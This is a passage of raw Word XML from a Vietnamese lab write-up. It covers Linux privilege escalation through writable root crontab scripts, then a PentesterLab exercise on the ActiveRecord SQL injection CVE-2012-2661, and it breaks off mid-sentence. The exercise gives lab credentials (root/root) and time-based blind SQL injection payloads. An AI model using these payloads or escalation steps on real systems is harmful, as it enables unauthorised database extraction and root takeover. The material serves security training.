      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/php5/apache2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB113C8" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Và cuối cùng là tìm hiểu về Crotab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5350D3DF"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Crontab được sử dụng trên Linux/UNIX để chạy các tác vụ tại một thời điểm nhất định.  Chúng ta có thể tìm danh sách crontabs trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/var /spool /cron/crontabs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc sử dụng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crontab -u &lt;user&gt; -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để liệt kê các tác vụ cho một người dùng nhất định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDCE15C" w14:textId="474AE6FE" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7E1A0551">
          <v:shape id="Picture 43" o:spid="_x0000_i1245" type="#_x0000_t75" style="width:276pt;height:207pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId241" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE6DF9" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Một trong những điều quan trọng cần tìm là quyền đối với các tập lệnh được gọi bởi một nhiệm vụ.  Ví dụ, đây là tập lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/root/backup.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được tự động chạy trong các tác vụ của root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DC458" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/var/spool/cron/crontabs/root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B24A79" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l /root/backup.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDFCA04" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Các quyền trên tập lệnh này phải được sửa đổi để ngăn bất kỳ người dùng nào sửa đổi tập lệnh để giành quyền truy cập root vào lần tiếp theo tác vụ được chạy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647AF63" w14:textId="0F19C095" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3731DDE1">
          <v:shape id="Picture 44" o:spid="_x0000_i1246" type="#_x0000_t75" style="width:333pt;height:27.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId242" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0790D" w14:textId="45202A29" w:rsidR="00425DDD" w:rsidRPr="00F12C2B" w:rsidRDefault="00FA2235" w:rsidP="00AC2F30">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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D24404" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>CVE-2012-2661: ActiveRecord SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C24B4C" w14:textId="23DB75B9" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="00D24404" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="000F3CE5" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF7EB2"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Link bài tập: </w:t>
      </w:r>
      <w:hyperlink r:id="rId243" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/cve-2012-2661/course</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="713C5591" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bài tập lần này trình bày chi tiết việc khai thác lỗi ActiveRecord SQL Injection (CVE-2012-2661) và cách kẻ tấn công có thể kết xuất thông tin từ cơ sở dữ liệu bằng cách sử dụng sự cố này.  Lỗ hổng này rất khó khai thác và chúng ta sẽ xem nó có thể được thực hiện như thế nào.  Không chỉ là cách sử dụng khai thác, bài tập này nên được coi là một cách tổng quát để tiếp cận lỗ hổng và chuyển từ lỗi sang khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB92E3" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Do cách Active Record xử lý các tham số truy vấn lồng nhau, chúng ta có thể sử dụng một yêu cầu được chế tạo đặc biệt để đưa một số dạng SQL vào các truy vấn SQL của ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2EE800" w14:textId="146E8176" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="00D24404" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="000F3CE5" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51874A86" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta sử dụng tools putty.exe để truy cập server qua ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42E0B4" w14:textId="3076B7F6" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Link tải: </w:t>
      </w:r>
      <w:hyperlink r:id="rId244" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76B3340D" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Truy cập vào địa chỉ ip máy chủ Debian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E0CEAF" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>User: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265E211" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Password: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499EA5DA"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Đầu tiên chúng ta truy cập vào thư mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>home/user/shell.rb</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để xem cấu hình file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D89D0" w14:textId="77FBA36D"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604FFF22">
          <v:shape id="Picture 52" o:spid="_x0000_i1247" type="#_x0000_t75" style="width:282pt;height:210pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId245" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ACE6CD" w14:textId="557C3008" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Active Record là M trong MVC mô hình   là lớp của hệ thống chịu trách nhiệm đại diện cho dữ liệu kinh doanh và logic. Active Record tạo điều kiện thuận lợi cho việc tạo và sử dụng các đối tượng nghiệp vụ có dữ liệu yêu cầu lưu trữ liên tục vào cơ sở dữ liệu. Nó là một triển khai của mẫu Active Record mà bản thân nó là một mô tả của hệ thống Ánh xạ quan hệ đối tượng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F1213"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Chúng ta bắt đầu thực thi file shell.rb với lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ruby shell.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7605474E" w14:textId="033550EB" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="008228FC" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="66FC96E2">
          <v:shape id="Picture 53" o:spid="_x0000_i1248" type="#_x0000_t75" style="width:303.75pt;height:32.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId246" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D6476" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng lệnh User.where(:id =&gt;1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>).all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để kiểm tra phương thức xảy ra vấn đề gì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2253D6B7" w14:textId="6192BE36"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49807EF1">
          <v:shape id="Picture 54" o:spid="_x0000_i1249" type="#_x0000_t75" style="width:467.25pt;height:49.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId247" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0560E7C7" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Dữ liệu vẫn chưa được mã hóa và xử lý</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A860BB" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sao khi đã đọc hiểu thông tin ta tiến hành khai thác Sql hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393E2EA" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Đầu tiên ta sử dụng lệnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">User.where(:id =&gt; {'information_schema where (select 1) or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1) ; -- .user' =&gt; {'id' =&gt; '1'}}).all </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>để nhận được các phản hổi từ máy chủ hệ thống về các table name của máy chủ trong quá trình thử nghiệm ActiveRecord lưu vào bộ nhớ đệm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7503F3" w14:textId="4F0F3905"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4EB69F6F">
          <v:shape id="Picture 55" o:spid="_x0000_i1250" type="#_x0000_t75" style="width:348.75pt;height:279.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId248" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13254C0F" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E39991" w14:textId="77777777" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiếp theo ta sử dụng lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: User.where(:id =&gt; {'information_schema where (select 0) or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sleep(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1/10)  /*'+Time.now.to_f.to_s+'*/; -- .user' =&gt; {'id' =&gt; '1'}}).all</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> được sử dụng ở đây để tự động đưa thời gian vào bên trong nhận xét SQL. Điều này sẽ ngăn chặn bất kỳ bộ nhớ đệm nào được thực hiện bởi </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active Record</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.Mục đích này nhầm thực thi được kết quả cho 2 lần kiểm thử.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E871967" w14:textId="5FF0A99E"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36F49479">
          <v:shape id="Picture 56" o:spid="_x0000_i1251" type="#_x0000_t75" style="width:300.75pt;height:245.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId249" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE67A6E" w14:textId="184B90AE" w:rsidR="000F3CE5" w:rsidRPr="00F12C2B" w:rsidRDefault="000F3CE5" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo ta tiến đến quá trình tự động khai thác.</w:t>
      </w:r>
      <w:r w:rsidR="00E707D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Để hiểu về vấn đề này ta tiến hay truy cập vào file </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
